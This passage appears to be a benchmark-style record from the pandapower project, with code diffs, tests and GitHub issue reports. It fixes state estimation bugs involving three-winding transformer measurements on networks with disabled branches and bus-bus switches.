P_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, P_FROM_IDX] = meas_from.index.values + branch_append[ix_to, P_TO] = meas_to.value.values + branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, P_TO_IDX] = meas_to.index.values + + q_tr_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo") & + meas.element.isin(map_trafo)] + if len(q_tr_measurements): + meas_from = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == + net.trafo.hv_bus[q_tr_measurements.element]).values] + meas_to = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == + net.trafo.lv_bus[q_tr_measurements.element]).values] + ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] + ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] + branch_append[ix_from, Q_FROM] = meas_from.value.values + branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, Q_FROM_IDX] = 
meas_from.index.values + branch_append[ix_to, Q_TO] = meas_to.value.values + branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, Q_TO_IDX] = meas_to.index.values - # Add measurements for trafo3w - i_tr3w_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo3w")] - if len(i_tr3w_measurements): - meas_hv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == - net.trafo3w.hv_bus[i_tr3w_measurements.element]).values] - meas_mv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == - net.trafo3w.mv_bus[i_tr3w_measurements.element]).values] - meas_lv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == - net.trafo3w.lv_bus[i_tr3w_measurements.element]).values] - ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] - ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] - ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] - i_ka_to_pu_hv = (net.bus.vn_kv[meas_hv.side]).values - i_ka_to_pu_mv = (net.bus.vn_kv[meas_mv.side]).values - i_ka_to_pu_lv = (net.bus.vn_kv[meas_lv.side]).values - branch_append[ix_hv, IM_FROM] = meas_hv.value.values * i_ka_to_pu_hv - branch_append[ix_hv, IM_FROM_STD] = meas_hv.std_dev.values * i_ka_to_pu_hv - branch_append[ix_hv, IM_FROM_IDX] = meas_hv.index.values - branch_append[ix_mv, IM_TO] = meas_mv.value.values * i_ka_to_pu_mv - branch_append[ix_mv, IM_TO_STD] = meas_mv.std_dev.values * i_ka_to_pu_mv - branch_append[ix_mv, IM_TO_IDX] = meas_mv.index.values - branch_append[ix_lv, IM_TO] = meas_lv.value.values * i_ka_to_pu_lv - branch_append[ix_lv, IM_TO_STD] = meas_lv.std_dev.values * i_ka_to_pu_lv - branch_append[ix_lv, IM_TO_IDX] = meas_lv.index.values - - p_tr3w_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo3w")] - if len(p_tr3w_measurements): - meas_hv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == - net.trafo3w.hv_bus[p_tr3w_measurements.element]).values] - meas_mv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == - net.trafo3w.mv_bus[p_tr3w_measurements.element]).values] - meas_lv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == - net.trafo3w.lv_bus[p_tr3w_measurements.element]).values] - ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] - ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] - ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] - branch_append[ix_hv, P_FROM] = meas_hv.value.values - branch_append[ix_hv, P_FROM_STD] = meas_hv.std_dev.values - branch_append[ix_hv, P_FROM_IDX] = meas_hv.index.values - branch_append[ix_mv, P_TO] = meas_mv.value.values - branch_append[ix_mv, P_TO_STD] = meas_mv.std_dev.values - branch_append[ix_mv, P_TO_IDX] = meas_mv.index.values - branch_append[ix_lv, P_TO] = meas_lv.value.values - branch_append[ix_lv, P_TO_STD] = meas_lv.std_dev.values - branch_append[ix_lv, P_TO_IDX] = meas_lv.index.values - - q_tr3w_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo3w")] - if len(q_tr3w_measurements): - meas_hv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == - net.trafo3w.hv_bus[q_tr3w_measurements.element]).values] - meas_mv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == - net.trafo3w.mv_bus[q_tr3w_measurements.element]).values] - meas_lv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == - 
net.trafo3w.lv_bus[q_tr3w_measurements.element]).values] - ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] - ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] - ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] - branch_append[ix_hv, Q_FROM] = meas_hv.value.values - branch_append[ix_hv, Q_FROM_STD] = meas_hv.std_dev.values - branch_append[ix_hv, Q_FROM_IDX] = meas_hv.index.values - branch_append[ix_mv, Q_TO] = meas_mv.value.values - branch_append[ix_mv, Q_TO_STD] = meas_mv.std_dev.values - branch_append[ix_mv, Q_TO_IDX] = meas_mv.index.values - branch_append[ix_lv, Q_TO] = meas_lv.value.values - branch_append[ix_lv, Q_TO_STD] = meas_lv.std_dev.values - branch_append[ix_lv, Q_TO_IDX] = meas_lv.index.values + # Add measurements for trafo3w + if map_trafo3w is not None: + i_tr3w_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo3w") & + meas.element.isin(map_trafo3w)] + if len(i_tr3w_measurements): + meas_hv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == + net.trafo3w.hv_bus[i_tr3w_measurements.element]).values] + meas_mv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == + net.trafo3w.mv_bus[i_tr3w_measurements.element]).values] + meas_lv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == + net.trafo3w.lv_bus[i_tr3w_measurements.element]).values] + ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] + ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] + ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] + i_ka_to_pu_hv = (net.bus.vn_kv[meas_hv.side]).values + i_ka_to_pu_mv = (net.bus.vn_kv[meas_mv.side]).values + i_ka_to_pu_lv = (net.bus.vn_kv[meas_lv.side]).values + branch_append[ix_hv, IM_FROM] = meas_hv.value.values * i_ka_to_pu_hv + branch_append[ix_hv, IM_FROM_STD] = meas_hv.std_dev.values * i_ka_to_pu_hv + branch_append[ix_hv, IM_FROM_IDX] = meas_hv.index.values + branch_append[ix_mv, IM_TO] = meas_mv.value.values * i_ka_to_pu_mv + branch_append[ix_mv, IM_TO_STD] = meas_mv.std_dev.values * i_ka_to_pu_mv + branch_append[ix_mv, IM_TO_IDX] = meas_mv.index.values + branch_append[ix_lv, IM_TO] = meas_lv.value.values * i_ka_to_pu_lv + branch_append[ix_lv, IM_TO_STD] = meas_lv.std_dev.values * i_ka_to_pu_lv + branch_append[ix_lv, IM_TO_IDX] = meas_lv.index.values + + p_tr3w_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo3w") & + meas.element.isin(map_trafo3w)] + if len(p_tr3w_measurements): + meas_hv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == + net.trafo3w.hv_bus[p_tr3w_measurements.element]).values] + meas_mv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == + net.trafo3w.mv_bus[p_tr3w_measurements.element]).values] + meas_lv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == + net.trafo3w.lv_bus[p_tr3w_measurements.element]).values] + ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] + ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] + ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] + branch_append[ix_hv, P_FROM] = meas_hv.value.values + branch_append[ix_hv, P_FROM_STD] = meas_hv.std_dev.values + branch_append[ix_hv, P_FROM_IDX] = meas_hv.index.values + branch_append[ix_mv, P_TO] = meas_mv.value.values + branch_append[ix_mv, P_TO_STD] = meas_mv.std_dev.values + 
branch_append[ix_mv, P_TO_IDX] = meas_mv.index.values + branch_append[ix_lv, P_TO] = meas_lv.value.values + branch_append[ix_lv, P_TO_STD] = meas_lv.std_dev.values + branch_append[ix_lv, P_TO_IDX] = meas_lv.index.values + + q_tr3w_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo3w") & + meas.element.isin(map_trafo3w)] + if len(q_tr3w_measurements): + meas_hv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == + net.trafo3w.hv_bus[q_tr3w_measurements.element]).values] + meas_mv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == + net.trafo3w.mv_bus[q_tr3w_measurements.element]).values] + meas_lv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == + net.trafo3w.lv_bus[q_tr3w_measurements.element]).values] + ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] + ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] + ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] + branch_append[ix_hv, Q_FROM] = meas_hv.value.values + branch_append[ix_hv, Q_FROM_STD] = meas_hv.std_dev.values + branch_append[ix_hv, Q_FROM_IDX] = meas_hv.index.values + branch_append[ix_mv, Q_TO] = meas_mv.value.values + branch_append[ix_mv, Q_TO_STD] = meas_mv.std_dev.values + branch_append[ix_mv, Q_TO_IDX] = meas_mv.index.values + branch_append[ix_lv, Q_TO] = meas_lv.value.values + branch_append[ix_lv, Q_TO_STD] = meas_lv.std_dev.values + branch_append[ix_lv, Q_TO_IDX] = meas_lv.index.values ppci["bus"] = np.hstack((ppci["bus"], bus_append)) ppci["branch"] = np.hstack((ppci["branch"], branch_append))
diff --git a/pandapower/test/estimation/test_wls_estimation.py b/pandapower/test/estimation/test_wls_estimation.py
--- a/pandapower/test/estimation/test_wls_estimation.py
+++ b/pandapower/test/estimation/test_wls_estimation.py
@@ -585,6 +585,49 @@ def test_network_with_trafo3w_pq():
     assert success
     assert (np.nanmax(np.abs(net.res_bus.vm_pu.values - net.res_bus_est.vm_pu.values)) < 0.006)
     assert (np.nanmax(np.abs(net.res_bus.va_degree.values- net.res_bus_est.va_degree.values)) < 0.006)
+
+
+def test_network_with_trafo3w_with_disabled_branch():
+    net = pp.create_empty_network()
+
+    bus_slack = pp.create_bus(net, vn_kv=110)
+    pp.create_ext_grid(net, bus=bus_slack)
+
+    bus_20_1 = pp.create_bus(net, vn_kv=20, name="b")
+    pp.create_sgen(net, bus=bus_20_1, p_mw=0.03, q_mvar=0.02)
+
+    bus_10_1 = pp.create_bus(net, vn_kv=10)
+    pp.create_sgen(net, bus=bus_10_1, p_mw=0.02, q_mvar=0.02)
+
+    bus_10_2 = pp.create_bus(net, vn_kv=10)
+    pp.create_load(net, bus=bus_10_2, p_mw=0.06, q_mvar=0.01)
+    pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2)
+    disabled_line = pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2)
+    net.line.at[disabled_line, 'in_service'] = False
+
+    pp.create_transformer3w(net, bus_slack, bus_20_1, bus_10_1, std_type="63/25/38 MVA 110/20/10 kV")
+
+    pp.runpp(net)
+
+    pp.create_measurement(net, "p", "line", net.res_line.p_from_mw[0], 0.001, 0, 'from')
+    pp.create_measurement(net, "q", "line", net.res_line.q_from_mvar[0], 0.001, 0, 'from')
+    pp.create_measurement(net, "p", "line", net.res_line.p_to_mw[0], 0.001, 0, 'to')
+    pp.create_measurement(net, "q", "line", net.res_line.q_to_mvar[0], 0.001, 0, 'to')
+
+    pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_hv_mw[0], 0.001, 0, 'hv')
+    pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_hv_mvar[0], 0.001, 0, 'hv')
+    pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_mv_mw[0], 0.002, 0, 'mv')
+    pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_mv_mvar[0], 0.002, 0, 'mv')
+    pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_lv_mw[0], 0.001, 0, 'lv')
+    pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_lv_mvar[0], 0.001, 0, 'lv')
+
+    pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[0], 0.01, 0)
+    pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[1], 0.01, 1)
+
+    success = estimate(net)
+    assert success
+    assert (np.nanmax(np.abs(net.res_bus.vm_pu.values - net.res_bus_est.vm_pu.values)) < 0.006)
+    assert (np.nanmax(np.abs(net.res_bus.va_degree.values- net.res_bus_est.va_degree.values)) < 0.006)
 
 
 def r(v=0.03):
State estimation module error when net has disabled branches

Hi, I came across a bug in the state estimation module when running the following code for the new trafo3w functionality added in 5234059ca65a6c8e1bdb27ddbbd57cceb620a960. The net was modified with one disabled line. The reason seems to be that the branch mapping from pp to ppci changes if some branches are disabled or connected between two disabled buses.

The code for the test with a simple four bus network:

```python
import pandapower as pp
from pandapower.estimation import estimate

net = pp.create_empty_network()

bus_slack = pp.create_bus(net, vn_kv=110)
pp.create_ext_grid(net, bus=bus_slack)

bus_20_1 = pp.create_bus(net, vn_kv=20, name="b")
pp.create_sgen(net, bus=bus_20_1, p_mw=0.03, q_mvar=0.02)

bus_10_1 = pp.create_bus(net, vn_kv=10)
pp.create_sgen(net, bus=bus_10_1, p_mw=0.02, q_mvar=0.02)

bus_10_2 = pp.create_bus(net, vn_kv=10)
pp.create_load(net, bus=bus_10_2, p_mw=0.06, q_mvar=0.01)
pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2)
disabled_line = pp.create_line(net, from_bus=bus_10_1, to_bus=bus_10_2, std_type="149-AL1/24-ST1A 10.0", length_km=2)
net.line.at[disabled_line, 'in_service'] = False

pp.create_transformer3w(net, bus_slack, bus_20_1, bus_10_1, std_type="63/25/38 MVA 110/20/10 kV")

pp.runpp(net)

pp.create_measurement(net, "p", "line", net.res_line.p_from_mw[0], 0.001, 0, 'from')
pp.create_measurement(net, "q", "line", net.res_line.q_from_mvar[0], 0.001, 0, 'from')
pp.create_measurement(net, "p", "line", net.res_line.p_to_mw[0], 0.001, 0, 'to')
pp.create_measurement(net, "q", "line", net.res_line.q_to_mvar[0], 0.001, 0, 'to')

pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_hv_mw[0], 0.001, 0, 'hv')
pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_hv_mvar[0], 0.001, 0, 'hv')
pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_mv_mw[0], 0.002, 0, 'mv')
pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_mv_mvar[0], 0.002, 0, 'mv')
pp.create_measurement(net, "p", "trafo3w", net.res_trafo3w.p_lv_mw[0], 0.001, 0, 'lv')
pp.create_measurement(net, "q", "trafo3w", net.res_trafo3w.q_lv_mvar[0], 0.001, 0, 'lv')

pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[0], 0.01, 0)
pp.create_measurement(net, "v", "bus", net.res_bus.vm_pu[1], 0.01, 1)

success = estimate(net)
```
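A toy sketch of the mapping idea behind the eventual fix (variable names here are illustrative; the real code keys the mask off ppci['internal']['branch_is']): only in-service branches keep a slot in the pp -> ppci map, and element blocks that start later shift left by the number of branches dropped before them.

```python
import numpy as np

branch_is = np.array([True, False, True, True, True])  # branch 1 is out of service
line_index = [0, 1, 2]        # pandapower line indices
line_slots = range(0, 3)      # their positions in the full (unreduced) branch table

# Drop out-of-service branches from the measurement mapping
map_line = {l: b for l, b in zip(line_index, line_slots) if branch_is[b]}
print(map_line)               # {0: 0, 2: 2} - the disabled line gets no ppci slot

# Element tables that start later (e.g. trafos) shift by the dropped branches
trafo_start = 3
offset = int(np.sum(~branch_is[:trafo_start]))   # = 1 here
print(trafo_start - offset)                      # start position in the reduced table
```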
2018-12-18T09:11:11
e2nIEE/pandapower
258
e2nIEE__pandapower-258
[ "253", "253" ]
d6226e3022cb8e10a40f2d889825058a4a803362
diff --git a/pandapower/estimation/state_estimation.py b/pandapower/estimation/state_estimation.py --- a/pandapower/estimation/state_estimation.py +++ b/pandapower/estimation/state_estimation.py @@ -9,7 +9,7 @@ from scipy.stats import chi2 from pandapower.estimation.wls_ppc_conversions import _add_measurements_to_ppc, \ - _build_measurement_vectors, _init_ppc + _build_measurement_vectors, _init_ppc, _add_aux_elements_for_bb_switch, _drop_aux_elements_for_bb_switch from pandapower.estimation.results import _copy_power_flow_results, _rename_results from pandapower.idx_brch import F_BUS, T_BUS, BR_STATUS, PF, PT, QF, QT from pandapower.auxiliary import _add_pf_options, get_values, _clean_up @@ -27,7 +27,7 @@ def estimate(net, init='flat', tolerance=1e-6, maximum_iterations=10, - calculate_voltage_angles=True): + calculate_voltage_angles=True, fuse_all_bb_switches=True): """ Wrapper function for WLS state estimation. @@ -46,6 +46,11 @@ def estimate(net, init='flat', tolerance=1e-6, maximum_iterations=10, **calculate_voltage_angles** - (boolean) - Take into account absolute voltage angles and phase shifts in transformers, if init is 'slack'. Default is True. + + **fuse_all_bb_switches** - (bool) - if true when considering bus-bus-switches the buses + will fused (Default behaviour) otherwise auxiliary lines will be added between those buses + where an element is connected to them in order to clear the p,q results on each buses + instead of fusing them all together OUTPUT: **successful** (boolean) - Was the state estimation successful? @@ -63,7 +68,7 @@ def estimate(net, init='flat', tolerance=1e-6, maximum_iterations=10, delta_start = res_bus.va_degree.values elif init != 'flat': raise UserWarning("Unsupported init value. Using flat initialization.") - return wls.estimate(v_start, delta_start, calculate_voltage_angles) + return wls.estimate(v_start, delta_start, calculate_voltage_angles, fuse_all_bb_switches) def remove_bad_data(net, init='flat', tolerance=1e-6, maximum_iterations=10, @@ -186,7 +191,7 @@ def __init__(self, tolerance=1e-6, maximum_iterations=10, net=None, logger=None) self.delta = None self.bad_data_present = None - def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True): + def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True, fuse_all_bb_switches=True): """ The function estimate is the main function of the module. It takes up to three input arguments: v_start, delta_start and calculate_voltage_angles. The first two are the initial @@ -214,6 +219,11 @@ def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True OPTIONAL: **calculate_voltage_angles** - (bool) - Take into account absolute voltage angles and phase shifts in transformers Default is True. 
+ + **fuse_all_bb_switches** - (bool) - if true when considering bus-bus-switches the buses + will fused (Default behaviour) otherwise auxiliary lines will be added between those buses + where an element is connected to them in order to clear the p,q results on each buses + instead of fusing them all together OUTPUT: **successful** (boolean) - True if the estimation process was successful @@ -229,6 +239,12 @@ def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True if self.net is None: raise UserWarning("Component was not initialized with a network.") t0 = time() + + # change the configuration of the pp net to avoid auto fusing of buses connected + # through bb switch with elements on each bus if this feature enabled + if not fuse_all_bb_switches and not self.net.switch.empty: + _add_aux_elements_for_bb_switch(self.net) + # add initial values for V and delta # node voltages # V<delta @@ -369,6 +385,9 @@ def estimate(self, v_start=None, delta_start=None, calculate_voltage_angles=True mapping_table) _clean_up(self.net) + # clear the aux elements and calculation results created for the substitution of bb switches + if not fuse_all_bb_switches and not self.net.switch.empty: + _drop_aux_elements_for_bb_switch(self.net) # store variables required for chi^2 and r_N_max test: self.R_inv = r_inv.toarray() diff --git a/pandapower/estimation/wls_ppc_conversions.py b/pandapower/estimation/wls_ppc_conversions.py --- a/pandapower/estimation/wls_ppc_conversions.py +++ b/pandapower/estimation/wls_ppc_conversions.py @@ -5,6 +5,7 @@ import numpy as np +import pandas as pd from pandapower.auxiliary import _select_is_elements_numba, _add_ppc_options, _add_auxiliary_elements from pandapower.pd2ppc import _pd2ppc from pandapower.estimation.idx_bus import * @@ -13,6 +14,7 @@ from pandapower.idx_bus import bus_cols from pandapower.pf.run_newton_raphson_pf import _run_dc_pf from pandapower.build_branch import get_is_lines +from pandapower.create import create_buses, create_line_from_parameters try: import pplog as logging @@ -20,6 +22,92 @@ import logging std_logger = logging.getLogger(__name__) +AUX_BUS_NAME, AUX_LINE_NAME, AUX_SWITCH_NAME =\ + "aux_bus_se", "aux_line_se", "aux_bbswitch_se" + +def _add_aux_elements_for_bb_switch(net): + """ + Add auxiliary elements (bus, bb switch, line) to the pandapower net to avoid + automatic fuse of buses connected with bb switch with elements on it + :param net: pandapower net + :return: None + """ + def get_bus_branch_mapping(net): + bus_with_elements = set(net.load.bus).union(set(net.sgen.bus)).union( + set(net.shunt.bus)).union(set(net.gen.bus)).union( + set(net.ext_grid.bus)).union(set(net.ward.bus)).union( + set(net.xward.bus)) + + bus_ppci = pd.DataFrame(data=net._pd2ppc_lookups['bus'], columns=["bus_ppci"]) + bus_ppci['bus_with_elements'] = bus_ppci.index.isin(bus_with_elements) + bus_ppci['vn_kv'] = net.bus.loc[bus_ppci.index, 'vn_kv'] + ppci_bus_with_elements = bus_ppci.groupby('bus_ppci')['bus_with_elements'].sum() + bus_ppci.loc[:, 'elements_in_cluster'] = ppci_bus_with_elements[bus_ppci['bus_ppci'].values].values + return bus_ppci + + # find the buses which was fused together in the pp2ppc conversion with elements on them + # the first one will be skipped + _pd2ppc(net) + bus_ppci_mapping = get_bus_branch_mapping(net) + bus_to_be_handled = bus_ppci_mapping[((bus_ppci_mapping ['elements_in_cluster']>=2)&\ + bus_ppci_mapping ['bus_with_elements'])] + bus_to_be_handled = 
bus_to_be_handled[bus_to_be_handled['bus_ppci'].duplicated(keep='first')] + + # create auxiliary buses for the buses need to be handled + aux_bus_index = create_buses(net, bus_to_be_handled.shape[0], bus_to_be_handled.vn_kv.values, + name=AUX_BUS_NAME) + bus_aux_mapping = pd.Series(aux_bus_index, index=bus_to_be_handled.index.values) + + # create auxiliary switched and disable original switches connected to the related buses + net.switch.loc[:, 'original_closed'] = net.switch.loc[:, 'closed'] + switch_to_be_replaced_sel = ((net.switch.et == 'b') & + (net.switch.element.isin(bus_to_be_handled.index) | + net.switch.bus.isin(bus_to_be_handled.index))) + net.switch.loc[switch_to_be_replaced_sel, 'closed'] = False + + # create aux switches with selecting the existed switches + aux_switch = net.switch.loc[switch_to_be_replaced_sel, ['bus', 'closed', 'element', + 'et', 'name', 'original_closed']] + aux_switch.loc[:,'name'] = AUX_SWITCH_NAME + + # replace the original bus with the correspondent auxiliary bus + bus_to_be_replaced = aux_switch.loc[aux_switch.bus.isin(bus_to_be_handled.index), 'bus'] + element_to_be_replaced = aux_switch.loc[aux_switch.element.isin(bus_to_be_handled.index), 'element'] + aux_switch.loc[bus_to_be_replaced.index, 'bus'] =\ + bus_aux_mapping[bus_to_be_replaced].values + aux_switch.loc[element_to_be_replaced.index, 'element'] =\ + bus_aux_mapping[element_to_be_replaced].values + aux_switch['closed'] = aux_switch['original_closed'] + net.switch = net.switch.append(aux_switch, ignore_index=True) + + # create auxiliary lines as small impedance + for bus_ori, bus_aux in bus_aux_mapping.iteritems(): + create_line_from_parameters(net, bus_ori, bus_aux, length_km=1e-5, name=AUX_LINE_NAME, + r_ohm_per_km=0.15, x_ohm_per_km=0.2, c_nf_per_km=10, max_i_ka=1) + + +def _drop_aux_elements_for_bb_switch(net): + """ + Remove auxiliary elements (bus, bb switch, line) added by + _add_aux_elements_for_bb_switch function + :param net: pandapower net + :return: None + """ + # Remove auxiliary switches and restore switch status + net.switch = net.switch[net.switch.name!=AUX_SWITCH_NAME] + if 'original_closed' in net.switch.columns: + net.switch.loc[:, 'closed'] = net.switch.loc[:, 'original_closed'] + net.switch.drop('original_closed', axis=1, inplace=True) + + # Remove auxiliary buses, lines in net and result + for key in net.keys(): + if key.startswith('res_bus'): + net[key] = net[key].loc[net.bus.name != AUX_BUS_NAME, :] + if key.startswith('res_line'): + net[key] = net[key].loc[net.line.name != AUX_LINE_NAME, :] + net.bus = net.bus.loc[net.bus.name != AUX_BUS_NAME, :] + net.line = net.line.loc[net.line.name != AUX_LINE_NAME, :] + def _init_ppc(net, v_start, delta_start, calculate_voltage_angles): # select elements in service and convert pandapower ppc to ppc
diff --git a/pandapower/test/estimation/test_wls_estimation.py b/pandapower/test/estimation/test_wls_estimation.py --- a/pandapower/test/estimation/test_wls_estimation.py +++ b/pandapower/test/estimation/test_wls_estimation.py @@ -628,6 +628,55 @@ def test_network_with_trafo3w_with_disabled_branch(): assert success assert (np.nanmax(np.abs(net.res_bus.vm_pu.values - net.res_bus_est.vm_pu.values)) < 0.006) assert (np.nanmax(np.abs(net.res_bus.va_degree.values- net.res_bus_est.va_degree.values)) < 0.006) + + +def test_net_with_bb_switch(): + net = pp.create_empty_network() + pp.create_bus(net, name="bus1", vn_kv=10.) + pp.create_bus(net, name="bus2", vn_kv=10.) + pp.create_bus(net, name="bus3", vn_kv=10.) + pp.create_bus(net, name="bus4", vn_kv=110.) + pp.create_ext_grid(net, bus=3, vm_pu=1.0) + pp.create_line_from_parameters(net, 0, 1, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, + max_i_ka=1) + pp.create_transformer(net, 3, 0, std_type="40 MVA 110/10 kV") + + pp.create_load(net, 0, p_mw=.350, q_mvar=.100) + pp.create_load(net, 1, p_mw=.450, q_mvar=.100) + pp.create_load(net, 2, p_mw=.250, q_mvar=.100) + + # Created bb switch + pp.create_switch(net, 1, element=2, et='b') + pp.runpp(net, calculate_voltage_angles=True) + + pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[0], .002), .002, element=0) + pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[1], .002), .002, element=1) + pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[3], .002), .002, element=3) + + pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[3], .002), .002, element=3) + pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[3], .002), .002, element=3) + + # If measurement on the bus with bb-switch activated, it will incluence the results of the merged bus + pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[2], .001), .001, element=2) + pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[2], .001), .001, element=2) + pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[1], .001), .001, element=1) + pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[1], .001), .001, element=1) + + pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[0], .002), .002, 0, side='from') + pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[0], .002), .002, 0, side='from') + + pp.create_measurement(net, "p", "trafo", r2(net.res_trafo.p_hv_mw.iloc[0], .001), .01, + side="hv", element=0) + pp.create_measurement(net, "q", "trafo", r2(net.res_trafo.q_hv_mvar.iloc[0], .001), .01, + side="hv", element=0) + + success = estimate(net, tolerance=1e-5, fuse_all_bb_switches=False) + assert success + assert np.allclose(net.res_bus.va_degree.values,net.res_bus_est.va_degree.values, 1e-2) + assert np.allclose(net.res_bus.vm_pu.values,net.res_bus_est.vm_pu.values, 1e-2) + # asserting with more tolerance since the added impedance will cause some inaccuracy + assert np.allclose(net.res_bus.p_mw.values,net.res_bus_est.p_mw.values, atol=1e-2) + assert np.allclose(net.res_bus.q_mvar.values,net.res_bus_est.q_mvar.values, atol=1e-2) def r(v=0.03):
State estimation error with bus-bus switches and measurements on each bus

Hi, I am currently working on a high voltage network with lots of measurements. A bus in the pandapower network represents a busbar in a real-world substation, and the buses are connected with each other through bus-bus switches. A bus measurement (p, q) represents the power flow on a busbar.

However, the state estimation module (and similarly the power flow calculation) merges buses connected through a bb-switch into a single bus, and the measurements are not merged correctly onto that bus in the `_add_measurement` function.

I have tried to connect buses carrying measurements (and also loads or sgens) through short lines acting as a small impedance instead of bb-switches. This might be a way to solve the issue; however, it would be better to keep this substitution to a minimum.

The test code for a simple four-bus network:

```python
import numpy as np
from copy import deepcopy

import pandapower as pp
import pandapower.networks as pn
from pandapower.estimation import estimate as se


def r2(base, v):
    return np.random.normal(base, v)

# 1. Create network
net = pp.create_empty_network()
pp.create_bus(net, name="bus1", vn_kv=10.)
pp.create_bus(net, name="bus2", vn_kv=10.)
pp.create_bus(net, name="bus3", vn_kv=10.)
pp.create_bus(net, name="bus4", vn_kv=110.)
pp.create_ext_grid(net, bus=3, vm_pu=1.01)
pp.create_line_from_parameters(net, 0, 1, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1)
pp.create_line_from_parameters(net, 0, 2, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1)
pp.create_line_from_parameters(net, 1, 2, 10, r_ohm_per_km=.59, x_ohm_per_km=.35, c_nf_per_km=10.1, max_i_ka=1)
pp.create_transformer(net, 3, 0, std_type="40 MVA 110/10 kV")
pp.create_load(net, 0, .350, .100)
pp.create_load(net, 1, .450, .200)
